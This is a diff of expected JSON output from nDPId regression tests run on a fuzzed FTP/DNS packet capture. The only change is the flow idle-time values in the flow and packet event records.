-00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635052,"flow_last_seen":1120469635052,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1120469635052,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.65.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1120469635052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1120469635052,"pkt":"AODtAW69ADBUADRWCABFEABReRRAADkGcPGT6gH9wKhBAgAVCqDlH5dFr53DLFAYYzYwqgAAMjMwIEd1ZXN0IGFjY2VzcyBncmFudGVkIGZvciBhbm9ueW1vdSVzAAo="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635046,"flow_last_seen":1120469635046,"flow_idle_time":7560000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120469635046,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2208,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1120469635046,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":23,"thread_ts_msec":1120469635046,"pkt":"AKrtAW69ADBUADRWCABFEAAreQ5AADkGcR2T6gH9wKgBAgAVCKDlH5a+r53DLFgYYzbRlgAAIFUKAAAA"} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635048,"flow_last_seen":1120469635048,"flow_idle_time":7560000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":1,"thread_ts_msec":1120469635048,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2732,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1120469635048,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1120469635048,"pkt":"AODtAW69ADBUADRWCABFEABjeQ9AADkGcOST6gH9wKgBAgAVCqzlH5bBr53DLFAYYzY9pwAAIEZpbGVzIGxhcmdlciB0aGVuIDI1ME1CIHdpbGwgYmUgZGVsZXRlZCBhZnRlciA1IGRheXMgISEhDQo="} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635049,"flow_last_seen":1120469635049,"flow_idle_time":7560000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120469635049,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":1045,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1120469635049,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":23,"thread_ts_msec":1120469635049,"pkt":"AODtAW69ADBUADRWCABFEAAreRJAADkGcRmT6gH9wKgBAgQVCqDlH5cvr53DLFAYYzbRJQAAIA0KAAAA"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635052,"flow_last_seen":1120469635052,"flow_idle_time":7560000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1120469635052,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.65.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1120469635052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1120469635052,"pkt":"AODtAW69ADBUADRWCABFEABReRRAADkGcPGT6gH9wKhBAgAVCqDlH5dFr53DLFAYYzYwqgAAMjMwIEd1ZXN0IGFjY2VzcyBncmFudGVkIGZvciBhbm9ueW1vdSVzAAo="} 00195{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":78,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1120469635053} 00367{"packet_event_id":1,"packet_event_name":"packet","packet_id":78,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":62,"pkt_l4_len":0,"thread_ts_msec":1120469635052,"pkt":"ADBUADRWAODtAW69CADFAAAwabhAAIAGOX7AqAECk+oB\/QqgABWvncMs5R+XblAYP7tMeAAAVFlQRSBJDQo="} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635105,"flow_last_seen":1120469635105,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120469635105,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"84.168.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1120469635105,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1120469635105,"pkt":"AODtAW69ADBUADRWCABFEAA7eRVAADkGcQaT6gH9VKgBAgAVCqDlH5dur53DNFAYYzYlcwAAMjAwIFR5cGUgc2V0IHRvIEkNCg=="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635106,"flow_last_seen":1120469635106,"flow_idle_time":7440000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1120469635106,"l3_proto":"ip4","src_ip":"192.112.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1120469635106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1120469635106,"pkt":"ADBUADRWAODtAW69CABFAAAuablAAIAGOX\/AcAECk+oB\/QqgABWvncM05R+XgVAYP6htwgAAUEFTVg0K"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635105,"flow_last_seen":1120469635105,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120469635105,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"84.168.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1120469635105,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1120469635105,"pkt":"AODtAW69ADBUADRWCABFEAA7eRVAADkGcQaT6gH9VKgBAgAVCqDlH5dur53DNFAYYzYlcwAAMjAwIFR5cGUgc2V0IHRvIEkNCg=="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635106,"flow_last_seen":1120469635106,"flow_idle_time":7560000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1120469635106,"l3_proto":"ip4","src_ip":"192.112.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1120469635106,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1120469635106,"pkt":"ADBUADRWAODtAW69CABFAAAuablAAIAGOX\/AcAECk+oB\/QqgABWvncM05R+XgVAYP6htwgAAUEFTVg0K"} 00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":81,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":72,"global_ts_msec":1120469635127} 00428{"packet_event_id":1,"packet_event_name":"packet","packet_id":81,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1120469635106,"pkt":"AODtAW69ADBUADRWCABFqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635128,"flow_last_seen":1120469635128,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120469635128,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.117.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1120469635128,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1120469635128,"pkt":"ADBUADRWAODtAW6zCABFAAA7aU1AAIAGOXHAqAECk3UB\/QqgABWvHcM65R+X+lAYP3SxkwAAUkVUUiBTaXRlJXMAdC54bWwNCg=="} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635128,"flow_last_seen":1120469635128,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120469635128,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.117.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1120469635128,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1120469635128,"pkt":"ADBUADRWAODtAW6zCABFAAA7aU1AAIAGOXHAqAECk3UB\/QqgABWvHcM65R+X+lAYP3SxkwAAUkVUUiBTaXRlJXMAdC54bWwNCg=="} 00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":83,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":28,"global_ts_msec":1120469635129} 00367{"packet_event_id":1,"packet_event_name":"packet","packet_id":83,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":62,"pkt_l4_len":0,"thread_ts_msec":1120469635128,"pkt":"ADBUADRWAODtAW69CABFAAB6abtAAIAGOXvAqAEGk+oB\/Qqh5ncb6piKAAAAAHACQABGAAAAAgQFtAkBBAI="} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":84,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120469635147} 00415{"packet_event_id":1,"packet_event_name":"packet","packet_id":84,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":99,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":99,"pkt_l4_len":0,"thread_ts_msec":1120469635128,"pkt":"qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635152,"flow_last_seen":1120469635152,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469635152,"l3_proto":"ip4","src_ip":"37.115.0.253","dst_ip":"192.168.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1120469635152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469635152,"pkt":"AODtAW69ADBUADRWCABFAAAweRhAADkGcR4lcwD9wKgBAuZ3CqHlIbocG+qYi3ASYzaDqwAAAQEEAgIEBYM="} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635152,"flow_last_seen":1120469635152,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469635152,"l3_proto":"ip4","src_ip":"37.115.0.253","dst_ip":"192.168.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1120469635152,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469635152,"pkt":"AODtAW69ADBUADRWCABFAAAweRhAADkGcR4lcwD9wKgBAuZ3CqHlIbocG+qYi3ASYzaDqwAAAQEEAgIEBYM="} 00217{"error_event_id":13,"error_event_name":"TCP packet smaller than expected","datalink":1,"packet_id":86,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","size":54,"expected":62,"global_ts_msec":1120469635152} 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":86,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":42,"pkt_len":54,"pkt_l4_len":12,"thread_ts_msec":1120469635152,"pkt":"ADBUADRWAODtAW69CABHAAAoabxAAIAGOYLAqAECk+oB\/Qqh5ncb6piL5SG6HVAQQiTRUAAA"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635153,"flow_last_seen":1120469635153,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469635153,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2721,"dst_port":58999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1120469635153,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1120469635153,"pkt":"ADBUADRWAODtAW69CABFAAAoab1AAIAGOYHAqAECk+oB\/Qqh5ncb6piL5SG6HVARQiTRTwAA"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635173,"flow_last_seen":1120469635173,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469635173,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.232.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1120469635173,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1120469635173,"pkt":"AODtAW69ADBUADRWCABFAAAoeRlAADkGcSWT6gH9wOgBAuZ3CqHlIbodG+qYjFAQYzawPQAAAAAAAAAA"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635179,"flow_last_seen":1120469635179,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469635179,"l3_proto":"ip4","src_ip":"37.115.0.2","dst_ip":"147.234.1.253","src_port":2639,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1120469635179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1120469635179,"pkt":"ADBUADRWAODtAW69CABFAAAoacBAAIAGOX4lcwACk+oB\/QpPABWvncNU5R+X8VAQPzkeUQAA"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635153,"flow_last_seen":1120469635153,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469635153,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2721,"dst_port":58999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1120469635153,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1120469635153,"pkt":"ADBUADRWAODtAW69CABFAAAoab1AAIAGOYHAqAECk+oB\/Qqh5ncb6piL5SG6HVARQiTRTwAA"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635173,"flow_last_seen":1120469635173,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469635173,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.232.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1120469635173,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1120469635173,"pkt":"AODtAW69ADBUADRWCABFAAAoeRlAADkGcSWT6gH9wOgBAuZ3CqHlIbodG+qYjFAQYzawPQAAAAAAAAAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635179,"flow_last_seen":1120469635179,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469635179,"l3_proto":"ip4","src_ip":"37.115.0.2","dst_ip":"147.234.1.253","src_port":2639,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1120469635179,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1120469635179,"pkt":"ADBUADRWAODtAW69CABFAAAoacBAAIAGOX4lcwACk+oB\/QpPABWvncNU5R+X8VAQPzkeUQAA"} 00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":97,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":58,"global_ts_msec":1120469638585} 00414{"packet_event_id":1,"packet_event_name":"packet","packet_id":97,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120469637833,"pkt":"\/\/\/\/\/7\/\/AODtAW69CABFAABeacMAAIARTIrAqAECwKgB\/wCJAIkAOluqhPEBEAABAAAAAAB0IEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469663172,"flow_last_seen":1120469663172,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469663172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.136.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -198,10 +198,10 @@ 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469572841,"flow_last_seen":1120469572842,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2714,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 